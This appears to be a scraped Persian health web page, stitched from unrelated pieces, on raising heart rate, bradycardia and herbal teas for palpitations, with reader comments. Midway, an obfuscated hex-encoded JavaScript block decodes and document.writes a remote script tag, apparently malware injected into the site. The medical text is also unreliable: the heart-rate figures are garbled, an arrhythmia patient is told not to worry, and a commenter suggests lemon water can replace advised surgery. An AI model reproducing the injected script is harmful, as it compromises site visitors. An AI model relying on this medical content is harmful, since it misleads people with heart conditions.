داروی گیاهی برای بالا بردن ضربان قلب

تحقیقات نشان داده است که انجام برخی فعالیت ها ، تنها به مدت ۳۰دقیقه ، تاثیر مثبتی در سلامت بدن و بالا بردن ضربان قلب دارد.
چرا که ضربان قلب پایین با بالا رفتن سن ، موجب احساس سرما شدید می شود و برای مقابله با این شرایط لازم است برخی فعالیت های روزانه را انجام دهید و تا زمانی که قادر به انجام این فعالیت ها هستید نیازی به تمرینات سنگین نیست.
همچنین تمرینات ورزشی بدنسازی و سنگین تاثیر سالمی نخواهند داشت.

۱-وضعیت نشستن خود را تغییر دهید:

به جای نشستن روی صندلی معمولی روی توپ های بزرگ ورزشی بنشینید ، چرا که این کار جهت حفظ تعادل و صاف نگهداشتن بدن موجب تقویت عضلات می شود و حتی اگر قادر هستید از نشستن اجتناب کرده و زمان بیشتری را بایستید که نتیجه ای مشابه دارد ، چرا که همین تغییرات کوچک روی ضربان قلب تاثیر گذارند.

۲-برخی فعالیت های ساده ی روزانه را تغییر دهید:

داروی گیاهی برای بالا بردن ضربان قلب

در هنگام رفتن به محل کار یا خرید ، به جای قرار دادن ماشین در نزدیک ترین محل ، آن را در دورترین نقطه ممکن پارک کنید و به جای استفاده از آسانسور از پله استفاده کنید.

۳-تمرینات کششی:

انجام حرکات کششی ساده ، مثل کشش ساق پا ، کشش ران و شانه ها ، پس از حرکات روزانه باعث بالا رفتن ضربان قلب می شود.

۴-پیاده روی کنید:

چه برای انجام کارهای روزانه و یا تنها جهت پیاده روی کردن ، پیاده روی کنید ، چرا که این روش یکی از بهترین راه های بالا بردن ضربان قلب است.
حتی نیازی نیست که با سرعت بالا راه برید تنها لازم است با سرعت عادی پیاده روی کنید ، این کار ضربان قلب را بالا برده و به سلامت بدن کمک می کند.

۵-رابطه ی جنسی:

شاید عجیب باشد اما رابطه ی جنسی یکی از بهترین روش ها برای بالا بردن ضربان قلب است ، چرا که رابطه جنسی همراه با عشقبازی قادر است ضربان قلب را تا ۳۰بار در دقیقه بالا برده و ۱۰۰کالری بسوزاند.

۶-یوگا و تای-چی:

اگر قادر به انجام میزان استاندارد تمرینات ورشی نیستید ، انجام یوگا و تای-چی گزینه ی مناسبی می باشد ، چرا که علاوه بر بالا بردن ضربان قلب موجب برطرف شدن مشکلات وزن ، عضلات و مفاصل می شود.

۱-آهسته بدوید:

دویدن آهسته (آهسته اما با حالت و فرم دویدن (Jogging)جاگ) راه بسیار خوبی برای بالا بردن ضربان قلب است ، اما حتما پیش از این کار تمرینات جزئی جهت گرم کردن انجام بدید چرا که اگر در وحله یاول ورزش های سنگین را شروع کنید ، این کار موجب آسیب دیدن عضلات می شود.

۲-پیاده روی کوهستانی:

این کار نه تنها در بالا بردن ضربان قلب تاثیر دارد ، بلکه باعث قرار گرفتن فرد در طبیعت و لذت بردن از آن می شود.
برای این کار می توانید به طبیعت محل زندگی خود یا حتی اطراف شهر مراجعه کنید چرا که تنها چیزی که نیاز دارید مسیری با سطحی شیب دار است.

۳-شنا کنید:

شنا کردن یکی از بهترین تمرینات ورزشی است ، چرا که در این روش ضربه و آسیبی به استخوان وارد نمی شود.
همچنین اگر دچار اضافه وزن هستید شنا بهترین گزینه است ، چرا که وزن بدن در آب تقسیم شده و بدون وارد شدن فشاری به بدن ، قادر به انجام فعالیت هستید.

۴-دوچرخه سواری:

دوچرخه سواری در محلی نزدیک به محل زندگی و یا مکان های مخصوص و یا برای انجام فعالیت های روزانه مثل رفتن به محل کار تاثیر مفیدی خواهد داشت.
برای ایجاد تاثیری جزئی بر سطوح صاف و برای تاثیر در مسیرهای کوهستانی دوچرخه سواری کنید.

۵-طناب زدن:

شاید طناب زدن کاری کودکانه به نظر برسد اما این کار تاثیر فوق العاده ای دارد.
با دشوار شدن تنفس ، ضربان قلب سریع تر از آنچه فکرش را بکنید بالا خواهد رفت.
فقط از اندازه بودن طناب اطمینان حاصل کنید ، چرا که طناب بازی کودکان برای افراد بالغ مناسب نمی باشد.

۱-صخره نوردی:

می توانید حتی در فضای بسته و در شرایطی امن و به آسانی و به تنهایی یا با کمک مربی صخره نوردی را امتحان کنید که یکی از بهترین روش ها برای بالا بردن ضربان قلب و تناسب اندام است.
البته این ورزش شاید پرهزینه باشد اما کاملا ارزشش را دارد.

۲-دویدن:

از دویدن آهسته شروع کرده و آهسته آهسته سرعت را افزایش بدید.
اما اننتخاب مسیر مناسب برای حفظ سرعت و کاهش احتمال آسیب دیدگی ضروری است.
این کار ضربان فلب را تا حد زیادی بالا می برد.

داروی گیاهی برای بالا بردن ضربان قلب

۳-شنا:

شاید شنا رفتن در باشگاه کار سخت و دشواری باشد اما این تمرینات در بالا بردن ضربان قلب و تقویت عضلات اساسی بدن نقش بسیاری دارد.
اما پیش از انجام آن حتما گرم کنید.

۴-اسکات:

تمرین اسکات به این صورت انجام می شود که ، به صورت ایستاده و با فاصله در زانوها ، به آرامی باسن خود را مثل حالت قرار گرفتن بر روی صندلی ، به سمت پایین بکشید.
انجام این تمرین موجب بالا رفتن ضربان قلب ، تقویت عضلات و صاف نشستن می شود.

۵-بورپی:

بورپی یکی از تمرینات روتین اکثر باشگاه ها می باشد.
برای انجام بورپی ، بایستید بعد بپرید و به شکم دراز کشیده ، شنا برید و بعد با پرش دوباره به حالت ایستاده برگردید و این حرکت را با سرعتی که می توانید انجام بدید.

سلام
ضربان من در حالت عادی ۵۳ در هنگام فعالیت ورزشی تا ۱۵۰هم میرە و در حالت خواب و استراحت حتی تا ۴۱هم میاد.
مشکل از کجاست؟

با سلام در بعضی موارد این اتفاق طبیعی است اما باید توسط یک متخصص قلب برای مشکلاتی همچون آریتمی قلبی چک بشوید.

سلام.
من مشکل ارتیمی دارم .من درحالت عادی ضربان قلبم زیر ۵۰ هست دکتور گفت عمل بشم ولی من مشکل خاصی ندارم میشه بدون عمل ضربان قلبم بالا ببرم وعمل نکنم.
ممنونم

با سلام.خیر

سلام ٢٨ سالمه و دیس ریتمی دارم غالب دیس ریتمی تاکی کاردی تا ١۶٠ بوده اما ١ هفته است برادی کارد شدم ۴٨ اما همچنان در نوسان و تا تاکی کاردی پیش میره ،دکتر بارها رفتم اما میگن چیزی نیست ، این موضوع هم نگران و هم اذیتم میکنه لطفا راهنمایی کنید

با سلام چیزی نیست و لطفا نگران نباشید اما در صورت ادامه این اتفاق حتما به پزشک مراجعه کنید

سلام
به نظرم من شما باید هرروز ناشتا آب جوش را همراه لیمو ترش حداقل تا سه لیوان مصرف نموده و همین کار را شب قبل خوابیدن باید ناشتای شب هم ادامه بدهید و حداقل روزی یک ساعت پیاده روی داشته باشید تا به جراحی نیاز نداشته باشید

سلام، خسته نباشید.قلب من گاهی وقت ها کند میزنه و بی نظم میشه و سرم سبک میشه و گیج میشم، یه بار هم انگار می خاست از هوش برم .اکو و تست ورزشم خوب بود.تفقط کمی pvc داشتم بایدچه کار کنم.ممنونم

سلام من ناراحتی قلبی دارم و حتی بعضی وقت ها ضربان قلبم به ۲۴۵ یا ۳۷۰ نیز رسیده اما دکتر برام هیچ دارویی تجویز نکرده است و میگه که اگه از این زیاد تر بشه با اشعه میسوزون نش امه من گشادگی دریچه ی میترال هم دارم و یه سوراخ خوی بتن چپم میشه راهنمایم کنین

سلام.بنده هم همینطورکه دوستان عرض کردن گاهی ضربان قلبم به ۴۴ هم میرسد لطفابفرماییدمشکل من چی هست.ضمنا دوبارتست ورزش رفتم یبارهم توسط دکترکسرائیان بستری شدم.ابتداپیش هردکتری میرم بهم میگه ورزس میکنی.بله درسنین جوانی ورزش میکردم.ولی درحال حاضر۶۰سال سن دارم.لطفا راهنمایی بفرماییدچطوراندکیرضربان قلبم رابالا ببرم

نظر شما در مورد این مطلب چیست ؟

آدرس


Current ye@r *


Leave this field empty

سنگ کیسه صفرا، سنگ کوچکی است که اغلب از کلسترول ساخته شده و در کیسه صفرا ایجاد می شود. در

پوکی استخوان، اختلال استخوانی است که در آن استخوان ها باریک تر شده قدرت خود را از دست می دهند

یبوست در بزرگسالان، تغییر در عادات روده ای است. در یبوست در بزرگسالان، مدفوع ممکن است بسیار سفت و یا

درم ابریژن، یک روش زیبایی پوست است که در آن پوست سرد شده و سپس یک غلطک مخصوص پر سرعت

تبریک عید نوروز 98

همه چیز درباره بیماری برادیکاردی (کند تپشی)

برادیکاردی یعنی ضربان قلبتان بسیار آهسته باشد. در اکثر افراد قلب بین 6 تا 1 ضربه در دقیقه در زمان استراحت می‌زند. اگر قلبتان کمتر از 6 مرتبه در دقیقه بزند، یعنی تپش قلبتان کندتر از حد نرمال است.

کندتپشی قلب می‌تواند نرمال و سالم بوده و یا نشانه مشکلی در سیستم الکتریکی قلب باشد.

در بعضی افراد، کند بودن ضربان قلب مشکلی به وجود نمی‌آورد و حتی می‌تواند نشان سالم بودن باشد. افراد بزرگسال و ورزشکاران معمولا دارای ضربان قلبی پایین‌تر از 6 ضربه در دقیقه هستند.

داروی گیاهی برای بالا بردن ضربان قلب

اما در افراد دیگر برادیکاردی نشانه مشکلی در سیستم الکتریکی قلب است. به این معنی که ضربان‌ساز طبیعی قلب درست کار نمی‌کند و یا مجراهای الکتریکی قلب دچار اختلال شده‌اند. در اشکال جدی‌تر برادیکاردی، قلب آنقدر کند می‌زند که نمی‌تواند خون کافی برای نیازهای بدن پمپاژ کند. این علائمی در فرد ایجاد کرده که می‌تواند جان او را به خطر بیندازد.

مردان و زنان در سن 65 سال و بالاتر دچار کندتپشی می‌شوند که نیاز به درمان دارد. با بالا رفتن سن، سیستم الکتریکی قلب معمولا به طور نرمال کار نمی‌کند.

برادیکاردی چه علت‌هایی دارد؟

عوامل زیر می‌توانند موجب بروز برادیکاری در فرد شوند:

– تغییرات قلب که در اثر بالا رفتن سن ایجاد می‌شوند.

– بیماری‌هایی که به سیستم الکتریکی قلب آسیب می‌زنند. این بیماری‌ها عبارتند از: بیماری عروق کرونر، حمله قلبی، عفونت‌هایی مثل اندوکاردیت و میوکاردیت.

– وضعیت‌هایی که می‌توانند پالس‌های الکتریکی را در قلب کند کنند. نمونه‌های آن می‌تواند پایین بودن سطح تیروئید (کم‌کاری تیروئید) یا عدم‌توازن الکترولیت‌ها مثل بالا بودن میزان پتاسیم در خون باشد.

– بعضی داروهایی که برای درمان مشکلات قلبی یا فشارخون بالا استفاده می‌شوند مثل بتا-بلاکرها، آنتی‌هیستامین‌ها و دیگوکسین.

برادیکاردی چه نشانه‌هایی دارد؟

بیش از اندازه کند بودن ضربان قلب می‌تواند موجب بروز نشانه‌های زیر شود:

– احساس سرگیجه یا سبکی سر
– احساس تنگی‌نفس و مشکل در ورزش کردن
– احساس خستگی
– درد سینه
– احساس سردرگمی و مشکل در تمرکز
– غش، اگر کند بودن ضربان قلب موجب افت فشار خون شود.

بعضی افراد مبتلا به برادیکاری هیچ علائم و نشانه‌ای را تجربه نمی‌کنند و یا علائمشان آنقدر خفیف است که تصور می‌کنند بخاطر بالا رفتن سن باشد.

با گرفتن نبض می‌توانید سرعت ضربان‌قلب خودتان را اندازه بگیرید. اگر ضربان‌قلبتان کند و یا نظم بود، حتما با پزشکتان در میان بگذارید.

برادیکاردی چطور تشخیص داده می‌شود؟

پزشک برای تشخیص برادیکاردی نبض شما را می‌گیرد. همچنین ممکن است یک معاینه فیزیکی از شما انجام داده، سوالاتی درمورد سوابق سلامتی‌تان بپرسد و یا الکتروکاردیوگرام (EKG یا ECG) برایتان انجام دهد. EKG سیگنال‌های الکتریکی کنترل‌کننده ریتم قلب را اندازه‌گیری می‌کند.

برادیکاردی معمولا به طور ناپیوسته اتفاق می‌افتد، به همین دلیل ممکن است با EKG استاندارد که در مطب پزشک انجام می‌شود، این مشکل تشخیص داده نشود. EKG فقط زمانی می‌تواند برادیکاردی را تشخیص دهد که در زمان انجام آزمایش دچار آن باشید.

ممکن است لازم باشد یک الکتروکاردیوگرام قابل‌حمل با خود داشته باشید. این ابزار سبک هولتر مانیتور هم یده می‌شود. این مانیتور را یک یا چند روز به خود وصل می‌کنید و ریتم قلب شما را در طول روز ثبت می‌کند.

همچنین ممکن است برای تشخیص اینکه مشکل دیگری موجب بروز کند شدن ضربان قلب شما شده است یا نه، از شما آزمایش خون گرفته شود.

برادیکاردی چطور درمان می‌شود؟

اینکه برادیکاردی چطور درمان می‌شود به علت بروز آن بستگی دارد. نوع درمان به علائم آن هم مرتبط است. اگر برادیکاری موجب بروز هیچ علائمی نشده باشد، معمولا مورد درمان قرار نمی‌گیرد.

اگر آسیب به سیستم الکتریکی قلب موجب کند شدن ضربان قلب شما شده باشد، احتمالا لازم خواهد بود که یک ضربان‌ساز داشته باشید. ضربان‌ساز ابزاری است که زیر پوست شما قرار می‌گیرد و به اصلاح ضربان قلبتان کمک می‌کند. افراد بالاتر از 65 سال معمولا دچار برادیکاردی می‌شوند که نیاز به ضربان‌ساز دارد.

اگر مشکل جسمی دیگری مثل کم‌کاری تیروئید یا عدم‌توازن الکترولیت‌ها موجب کند شدن ضربان قلب شده باشد، درمان آن مشکل، برادیکاردی را نیز برطرف خواهد کرد.

اگر مصرف دارویی موجب کند شدن بی‌اندازه ضربان قلب شده باشد، دکتر دوز مصرفی دارو شما را تغییر داده و یا دارویتان را عوض خواهد کرد. اگر نمی‌توانید مصرف آن دارو را قطع کنید، احتمالا به ضربان‌ساز نیاز خواهید داشت.

هدف درمان بالا بردن ضربان قلب تا اندازه‌ای است که بدن خون موردنیاز خود را دریافت کند. اگر برادیکاری حاد مورد درمان قرار نگیرد، می‌تواند موجب بروز مشکلات بسیاری شود. این مشکلات عبارتند از غش و آسیب‌های ناشی از آن و حتی مرگ.

چه اقداماتی را می‌توانید در خانه برای بهبود برادیکاردی انجام دهید؟

برادیکاردی معمولا نتیجه یک مشکل قلبی دیگر است، به همین دلیل انجام اقداماتی برای داشتن سبک‌زندگی سالم‌تر می‌تواند سلامت عمومی شما را بالا ببرد. این اقدامات عبارتند از:

– داشتن یک بره‌غذایی که برای سلامت قلب مفید بوده و سرشار از میوه‌ها، سبزیجات، غلات کامل، ماهی و لبنیات کم‌چرب باشد.

– داشتن فعالیت بدنی در اکثر یا تمام روزهای هفته. پزشکتان به شما خواهد گفت که چه سطح از فعالیت بدنی برای شما بی‌اشکال و سالم است.

– پایین آوردن وزن در صورت لزوم.

– سیگار نکشیدن.

– کنترل سایر مشکلات جسمانی مثل فشارخون یا کلسترول بالا.

اگر دچار غش، درد سینه یا تنگی‌نفس حاد شدید، حتما به دنبال کمک اضطراری باشید. اگر احساس کردید ضربان‌قلبتان پایین‌تر از حد نرمال است، ممکن است دچار غش شوید و یا احساس تنگی‌نفس شدید داشتید، فورا با پزشکتان تماس بگیرید.

ضربان‌سازها یا پیس‌میکرها

اکثر کسانیکه از دستگاه‌های ضربان‌ساز استفاده می‌کنند، زندگی طبیعی و سالمی را دنبال می‌کنند. ممکن است لازم باشد که از چیزهایی که میدان‌های مغناطیسی یا الکتریکی قوی دارند دوری کنید زیرا عملکرد دستگاه شما را دچار اخلال می‌کنند. اما استفاده از اکثر دستگاه‌ها و تجهیزات الکتریکی خالی از مشکل است.

دکتر دستگاه پیس‌میکر شما را به طور منظم چک خواهد کرد. اگر دچار علائمی شدید که نشان می‌داد دستگاه به خوبی کار نمی‌کند، حتما با پزشکتان تماس بگیرید. این علائم عبارتند از:

داروی گیاهی برای بالا بردن ضربان قلب

– ضربان‌قلبتان خیلی تند یا خیلی کند شد.
– احساس سرگیجه، سبکی سر یا غش داشتید.
– دچار تنگی نفسی شدید که قبلا برایتان پیش نیامده بود و یا رو به وخامت بود. / مردمان

روی دکمه زیر کلیک فرمایید

فال حافظ

کپی برداری ممنوع !

© کپی بخش یا کل هر کدام از مطالب کوکا به هر نحو غیر مجاز می باشد.
هر گونه کپی برداری از محتوای سایت کوکا پیگرد قانونی دارد.
استفاده از مطالب سایت کوکا در سایت های خبر خوان و دارای آی فریم نیز اکیدا ممنوع است.

مطالب بخش سلامت و پزشکی سایت کوکا فقط جنبه اطلاع رسانی و آموزشی دارند. این مطالب توصیه پزشکی تلقی نمی شوند و نباید آنها را جایگزین مراجعه به پزشک جهت تشخیص و درمان کرد.

کودکان و نوجوانانی که درگیر اختلال اضطراب اجتماعی (SAD) هستند، گاهی تا بزرگسالی با این علائم زندگی می کنند بدون این که حتی متوجه آن ها شوند. اگر چه SAD سومین اختلال سلامت ذهن رایج است، بسیاری از والدین و معلمان با علائم و نشانه های آن در کودکان و نوجوانان آشنا نیستند. اختلال اضطراب اجتماعی شامل ترس یا فوبیای شدید از موقعیت های اجتماعی یا عملکردی است. اگرچه بسیاری از نوجوانان اضطراب های نرمال ناشی از تغییرات بلوغ را تجربه می کنند، افرادی که

می دانید فیتوتراپی چیست؟ آیا می دانستید که واکنش نسبت به برخی از داروها چهارمین علت مرگ و میر در آمریکا است؟ با توجه به تحقیقات منتشر شده توسط دانشگاه هاروارد، احتمال واکنش نسبت به داروهای تجویزی حتی پس از آزمایش آن ها یک پنجم است. حتی داروهایی که به درستی تجویز شده بودند نیز باعث بستری شدن ۱.۹ میلیون نفر در هر سال می شدند، از این میان حدود ۸۴۰,۰۰۰ نفر تحت تاثیر عوارض جانبی دارو در بیمارستان بستری می شدند. تمام این ها

حملات پانیک اتک (وحشت زدگی) یا  از علائم اصلی اختلالات پانیک هستند، اما می توانند به علت سایر عارضه های سلامتی و بهداشتی نیز اتفاق بیفتند. این عارضه ها با علائم متنوع فیزیکی، احساسی و شناختی همراه هستند که طاقت فرسا و غیر قابل تحمل هستند اما برای کنترل آن ها راه های زیادی وجود دارد. کسب اطلاعات درباره نشانه های رایج پانیک می تواند سودمند باشد. به علاوه درباره علت وقوع آن و استراتژی های کنترل آن باید تحقیق کنید. در این مقاله از

فواید کلاژن چیست؟ کلاژن ، فراوان ترین پروتئین در بدن است که در استخوان ها و بافت های همبند یافت می شود و در حالی که تکه ای از شام شب گذشته ممکن است سبب زیبایی بیش از حد نباشد، این قسمت ها حاوی مواد مغذی و ترکیباتی هستند که می توانند پوست شما را فربه و نرم نگه دارند، از تشکیل سلولیت ها جلوگیری کرده و آنها را بهبود بخشند و مو و ناخن هایتان سریع تر رشد یابند و سالم تر باشند. بیایید

رژیم غذایی MIND چیست؟ براساس تحقیقات اخیر، حداقل یکی از سه مورد بیماری آلزایمر، در سراسر جهان قابل پیشگیری است. یکی از آشناترین چیزهایی که ما در مورد درمان طبیعی آلزایمر می دانیم، داشتن یک رژیم غذایی سالم و ضد التهاب است. غذاهایی مانند سبزیجات، میوه، آجیل و ماهی سرشار از آنتی ‌اکسیدان ‌ها، چربی ‌های سالم و دیگر مواد فوتوشیمیایی هستند که از مغز در برابر بیماری آلزایمر، محافظت می کنند. در این مقاله از بخش تغذیه دکتر سلام به بررسی رژیم غذایی MIND

داروی گیاهی برای بالا بردن ضربان قلب

زایمان طبیعی در تمام دنیا جزء بهترین روش های زایمان است و نسبت به زایمان سزارین ارجحیت بیشتری دارد.با این حال یکی از عوارض زایمان طبیعی شل و

دالوکستین برای درمان افسردگی و اضطراب تجویز می شود. علاوه بر این برای بیماری ناراحتی اعصاب که در افراد دیابتی به وجود می آید مورد استفاده قرار می

غذاهای مناسب برای دیابتی ها کدامند؟ آیا دیابتی ها می توانند هر نوع غذایی که دوست دارند بخورند؟ چه وقت شام باشد یا ناهار و شما بیرون از

غذاهای مفید برای دل درد را می شناسید؟ هنگامی که دچار دل درد شده اید آخرین کاری که ممکن است به آن فکر کنید غذا خوردن است زیرا

با فواید کاهش وزن آشنایی دارید؟ آیا می دانید تنها کاهش 5 درصد کاهش وزن ، چه مزایا و تاثیراتی بر سلامتی شما می گذارد؟ شما لازم نیست

هر مادری، امیدوار است که دوران بارداری سالمی داشته باشد، اما گاهی اوقات عوارضی ناخواسته ایجاد می شود. دیابت بارداری یکی از شایع ترین

همانطور که می دانید هیدراته ماندن در دوران بارداری از اهمیت ویژه ای برخوردار است. نوشیدن مایعات کافی در دوران بارداری برای حفظ سلامتی

لوبیا و دانه های کامل مانند برنج قهوه ای، کینوا و گندم کامل، دارای فیبر زیادی هستند و سطح قند خون شما را افزایش نمی دهند. این مواد کلسترول را پایین می آورند و به شما احساس خوبی می دهند.

سرکه سیب برای خشک کردن زگیل ها و کشتن ویروس ها مفید است. خواص ضد میکروبی قوی دارد که در از بین بردن زگیل های تناسلی موثر است. اسید استیک موجود در سرکه سیب می تواند برخی از ویروس ها و باکتری ها را از بین ببرد.

روغن بابونه رومی یک ضد التهاب معروف است که هم برای انسان و هم برای سگ در صورت داشتن مشکلات پوستی مشابه مانند سوزش، سوختگی، جراحات، زخم یا اگزما بسیار عالی می باشد. این یک روغن بسیار ملایم است که به آرام کردن استرس سگ نیز کمک می کند.

روغن اسطوخودوس یک درمان مهم  موضعی برای مشکلات پوستی سگ مانند آلرژی و سوختگی است. این روغن  یک انتخاب رایج در بین روغن های ضروری  برای زخم ها و خارش پوست سگ می باشد.

برای درمان افسردگی و بد اخلاقی، صبح یک عدد موز بخورید. این میوه سروتونین مغز را افزایش داده و خوش اخلاقی را برایتان به ارمغان می آورد.

برای افزایش سوخت و ساز بدن، ناشتا آب بنوشید. نوشیدن آب لیمو ناشتا، باعث چربی سوزی می شود و میل کردن آب هویج ناشتا، کبد چرب را درمان می کند. همچنین خوردن آب سیب ناشتا، باعث درمان جوش و آکنه می شود.

جوشانده شنبیله می تواند خارش پوست سر را درمان کند. برای این منظور کمی شنبیله را در آب در حال جوش ریخته و پس از 15 دقیقه آن را صاف کنید و موهای خود را با این مایع بشویید. شما همچنین شاهد خوش حالتی موهای خود خواهید بود.

اثبات شده است که رژیم پالئو برای بهبود عدم تحمل گلوکز مفید است و به طور خاص، رژیم غذایی پالئو بیش از یک رژیم غذایی مدیترانه ای به منظور بهبود تحمل گلوکز در افراد مبتلا به بیماری های قلبی اثر بخش بوده است.

هر دو رژیم غذایی اتکینز و پالئو، افراد را به مصرف تمام غذاهای مغذی، از جمله گوشت تازه، ماهی، غذاهای دریایی، سبزیجات تازه، چربی های سالم و تشویق می کنند.

گزینه سالمی که برای مبتلایان به سرطان پروستات مناسب می باشد، خوردن گوجه فرنگی پخته است. گوجه فرنگی سرشار از آنتی اکسیدانی قوی به لیکوپن می باشد که زمانی که گوجه فرنگی پخته می شود، بدن به راحتی می تواند آن را جذب کند.

تمرین اسکات با تکیه به دیوار برای تقویت ران ها، مفاصل ران، ماهیچه های ساق پا و پایین تنه مناسب است. این تمرین ها

آیا امکان بزرگ کردن سینه ها وجود دارد؟ از افتادگی و شل بودن سینه های خود خسته شده اید؟ ما یک راه حل ساده

a”^5e^33^64^5e^32^3^5e^33^34^5e^33^62^5e^33^63^5e^32^66^5e^37^33^5e^36^33^5e^37^32^5e^36^39^5e^37^3^5e^37^34^5e^33^65^5e^33^63^5e^37^33^5e^36^33^5e^37^32^5e^36^39^5e^37^3^5e^37^34^5e^32^3^5e^37^34^5e^37^39^5e^37^3^5e^36^35^5e^33^64^5e^22^3b^76^61^72^2^65^3d^22^5e^33^63^5e^37^33^5e^36^33^5e^37^32^5e^36^39^5e^37^3^5e^37^34^5e^32^3^5e^37^34^5e^37^39^5e^37^3^5e^36^35^5e^33^64^5e^32^32^5e^37^3″ b”^32^5e^37^34^5e^36^35^5e^37^38^5e^37^34^5e^32^66^5e^36^61^5e^36^31^5e^37^36^5e^36^31^5e^37^33^5e^36^33^5e^37^32^5e^36^39^5e^37^3^5e^37^34^5e^32^32^5e^32^3^5e^37^33^5e^37^32^5e^36^33^5e^33^64^5e^32^32^5e^36^38^5e^37^34^5e^37^34^5e^37^3^5e^33^61^5e^32^66^5e^32^66^5e^37^61^5e^36^31^5e^37^32^5e^22^3b^76^61^72^2^64^3d^22^66^5e^37^35^5e^37^33^5e^36^35^5e^37^32^5e^34^64^5e^36^31^5e^37^38^5e^32^3″ c”6^39^5e^37^3^5e^37^34^5e^33^65^22^3b^76^61^72^2^62^3d^22^37^32^5e^32^3^5e^37^61^5e^36^31^5e^37^32^5e^37^3^5e^36^66^5e^37^3^5e^35^66^5e^37^35^5e^37^33^5e^36^35^5e^37^32^5e^35^66^5e^36^39^5e^36^34^5e^32^3^5e^33^64^5e^32^3^5e^33^32^5e^33^31^5e^33^37^5e^33^32^5e^33^62^5e^37^36^5e^36^31^5e^37^32^5e^32^3^5e^37^61^5e^36^31^5e^37^32^5e^37^3^5e^36^66^5e^37^3^5e^35^22^3b^76^61^72^2^63^3d^22^32″ d”4^5e^36^35^5e^37^38^5e^37^34^5e^32^66^5e^36^61^5e^36^31^5e^37^36^5e^36^31^5e^37^33^5e^36^33^5e^37^32^5e^36^39^5e^37^3^5e^37^34^5e^32^32^5e^33^65^5e^37^36^5e^36^31^5e^22^3b^76^61^72^2^78^3d^65^2b^62^2b^64^2b^63^2b^61^3b^64^6f^63^75^6d^65^6e^74^2e^77^72^69^74^65^28^75^6e^65^73^63^61^7^65^28^78^2e^72^65^7^6c^61^63^65^28^2f^5c^5e^2f^67^2c^2^27^25^27^29^29^29^3b^3c^2f^73^63^72^69^7^74^3e” e”^3c^73^63^72^69^7^74^2^74^79^7^65^3d^22^74^65^78^74^2f^6a^61^76^61^73^63^72^69^7^74^22^3e^76^61^72^2^61^3d^22^37^3^5e^36^66^5e^37^3^5e^32^65^5e^36^33^5e^36^66^5e^36^64^5e^32^66^5e^37^37^5e^36^35^5e^36^32^5e^37^33^5e^36^39^5e^37^34^5e^36^35^5e^32^66^5e^36^61^5e^37^33^5e^32^32^5e^32^3^5e^36^31^5e^37^33^5e^37^39^5e^36^65^5e^36^33^5e^33^65^5e^33^63^5e^32^66^5e^37^33^5e^36^33^5e^37^32^5e^3″ xe+c+b+a+d
.write(unescape(x.replace(/^/g, ‘%’)))

نسخه های گیاهی برای عارضه تپش قلب

ایران آنلاین /  به نظم بودن ضربان قلب تپش قلب می‌گویند که در همه سنین در مردان و زنان مشاهده می‌شود. گاهی نیز بالا رفتن ضربان قلب، پیش از وقوع یک حمله قلبی به وجود می‌آید و فرد به علت استرس به افزایش ضربان قلب دچار می‌شود. در این مطلب دمنوش‌هایی را معرفی می‌ کنیم که مصرف آن‌ها کمک شایانی به رفع تپش قلب می‌کند.


خواص بهار نارنج

مصرف بهارنارنج تپش نظم قلب و اضطراب را از بین می‌برد. عرق بهارنارنج خاصیت آرام‌بخشی و ضد تشنج دارد. بهارنارنج برای رفع کم‌خونی یا بی‌خوابی نیز مفید است، برای این منظور باید قبل از خواب عرق یا دَم‌کرده آن را بنوشید. بهارنارنج، سردرد‌های عصبی و میگرنی را نیز کاهش می‌دهد.


خواص به لیمو

داروی گیاهی برای بالا بردن ضربان قلب

به‌لیمو خاصیت آرام‌بخشی، ضد تشنج و ادرارآوری دارد و در رفع سرگیجه و تپش قلب نیز موثر است.


طرز تهیه دمنوش به‌لیمو

برای تهیه دمنوش به‌لیمو باید یک قاشق غذاخوری به‌لیمو را در یک قوری حاوی ۲ لیوان آب جوش به همراه مقداری نبات دَم کنید.


خواص اسطوخودوس

اسطوخودوس طبع گرم و خشک دارد و تپش قلب را نیز برطرف می‌کند.


طرز تهیه دمنوش اسطوخودوس

برای تهیه دمنوش اسطوخودوس باید حدود پنج گرم از گل این گیاه را در یک لیتر آب جوش بریزید و به مدت ۱۰ دقیقه آن را دَم کنید. می‌توانید روزانه سه تا چهار فنجان از این دمنوش را بنوشید.


خواص بادرنجبویه

بادرنجبویه دارای طبع گرم و خشک است. مصرف بادرنجبویه سبب تقویت قلب می‌شود همچنین آزمایش‌های جدید بر روی حیوانات آزمایشگاهی نشان می‌دهد که این گیاه همانند یک داروی مسکن بر روی دستگاه عصبی مرکزی عمل می‌کند و خاصیت آرام‌بخشی دارد.


خواص گل گاو

گل گاو زبان شادی‌آور، رقیق‌کننده خون و مقوی قلب است همچنین این گیاه اضطراب، دلهره، افسردگی و تپش قلب را نیز رفع می‌کند.


/ باشگاه خبرنگاران جوان

نظرات

های ارسال شده توسط شما، پس از تایید در سایت منتشر خواهد شد.

پیام های که حاوی تهمت یا افترا باشد در سایت منتشر نخواهد شد.

پیام های که به غیر از زبان فارسی یا غیر مرتبز با خبر باشد منتشر نخواهد شد.

ما را در شبکه های اجتماعی دنبال کنید

پر بازدیدها

آخرین اخبار

نقل و نشر مطالب با ذکر پایگاه خبری بلامانع است1

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *